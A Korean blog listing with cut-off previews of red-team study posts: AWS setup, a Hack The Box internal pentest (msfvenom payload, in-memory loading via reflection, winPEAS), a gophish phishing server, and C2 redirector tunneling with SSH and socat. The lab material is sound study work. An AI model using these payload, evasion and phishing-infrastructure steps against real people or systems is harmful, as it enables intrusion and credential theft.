목록Red Team/My 프로젝트 (17)
wonder

AWS 인프라 구축 복기 및 정리 입니다. 서브넷 CIDR 블록만 172.31.4.0/24 오른쪽 클릭 > 서브넷 설정 편집 > 퍼블릭 IPv4 주소 자동 할당 활성화 키페어 ssh-keygen -f rsa -b 2048 -f kakao -q -N "" 키페어 가져오기 > .pub공개키 복붙 우분투, 네트워크 서브넷, ssh 내아이피, http/https - 무관 route53-호스팅영역 호스팅영역, NS domain연결까지는 당연하고 루트도메인, www - A연결 ssh -i kakao ubuntu@18.222.255.49 가서 sudo su apt-get update snapd 는 원래깔려있습니다. sudo snap install core; sudo snap refresh core sudo snap ..

☞ 실전 내부망 모의해킹 - HTB: enterprise 확인해보니 win version 2019 1809 입니다. 18년에 마지막 업데이트로 많이 안된 시스템으로 보입니다. systeminfo.exe 로 얼마나 패치된지 확인합니다. get-mpreference 대부분 보려면 로컬 관리자 권한있어야 하지만 없어도 볼수있는게 disable realmonitoring:True =실시간 감지 꺼져 있습니다. 자동화된 스크립트 winpeas 사용하여 권한 상승 가능여부를 확인합니다. c# 을 사용해서 하드디스크 쓰지 않고 인메모리상에서 하려고합니다. msfvenom -p ~ -o 64비트.exe 포트 8443 python http.server 구동 ip a 바로 확인 $wp=[system.reflection.a..

☞ 실전 내부망 모의해킹 - HTB: enterprise nmap -p- --max-retries 1 모든포트한번만 -n dns resolution 안하고 -Pn 핑안함 --open 오픈된것만 보여달라 그다음 저장된 스캔 파일을 가지고 cat nmap.result | grep -i tcp | grep -vi nmap | grep -i open | cut -d '/' -f 1 | tr '\n' ',' tcp만 nmap윗줄은 빼고 오픈된 것만 /기준으로 첫번째것만 제외하고 뒤에거제거. 엔터를 콤마로 바꿔서 포트 모두 검색할 수 있도록 편하게 바꿉니다. -p [port list] -sV -sC -Pn -n --open 모두 검색 포트를 확인해보면 80 : IIS - Site doesn't have title...

☞ 피싱서버 구축3 : 피싱이메일 보내기까지 이상하게 www, mail, 루트도메인 모두 핑이 안되긴하지만 ssh -i guccissh ubuntu@mail.gucci0.com A레코드를 추가한 메일서버로 접속해주시구요. /opt/gophish sudo ./gophish 서버를 실행합니다. ssh -i guccissh ubuntu@18.217.56.96 -L 3333:127.0.0.1:3333 = 레드팀 로컬에서는 3333리슨해놓겠다. 들어와라 3333으로 통한다. 라는 뜻입니다. ☞ 템플릿 설정 localhost:3333 로 접속하여 템플릿을 만들고, 피싱사이트 html을 만들고, 타겟 피해자 받는사람 및 본인을 정의합니다. 이 떄 host는 smtp 설정 > 엔드포인트 email-smtp.us-eas..

☞ 레드팀 인프라 구축: 피싱 서버까지 구축 저번 시간에 정확히 이해하지 못해서 정확히 이해하고 넘어갈 필요가 있습니다. 너무 헷갈리니 그림으로 이해합시다. 포트포워딩 즉 리다이렉트 부분인데 타겟:win host > 리다이렉터:80 리다이렉터 80>리다이렉터 2222 리다이렉터 2222> 레드팀:80 레드팀80 > 포트80에서 실행중인 프로세스 이런식으로 포트가 연결되고 SSH 를 한번 더 연결하는 이유는 리다이렉트 하기 위함입니다. sudo socat tcp-listen:80,reuseaddr,fork,bind=0.0.0.0 tcp:127.0.0.1:2222 = 80리슨으로 하고 2222로 보내겠다.(포트포워딩) 레드팀 80리슨해주고 ssh -i guccissh ubuntu@18.188.56.153 -..

전체적으로 봤을 때 레드팀 로컬 - C2 > 그레이 - 리다이렉터, 피싱서버 > 타겟 으로 되어있습니다. 다른 인프라구축에 비해서 아주 단순한 구조지만 정확한 이해가 필요합니다. 레드팀 입장에서 설명하자면 도메인: advisary : 보통 해킹을 통해 장악한 도메인을 사용 > 레드팀은 합법적인 도메인 사이트 고대디 등에서 사용 리다이렉트: AWS클라우드 > 개별 서버: 메일, 피싱, http리다이렉터, 페이로드 배포 타겟의 클라우드에서는 바로 C2 서버를 클라우드로 만들어서 리다이렉트하는 것을 안좋아하기 때문에 일단 합법적인 리다이렉트 서버를 만들어 놓고 타겟이 해당 서버로 접속하면 C2서버로 바로 리다이렉트 해주는 구조입니다. 데브옵스 : 빠르고 간편하게 하기위해 kubernetes , terrafor..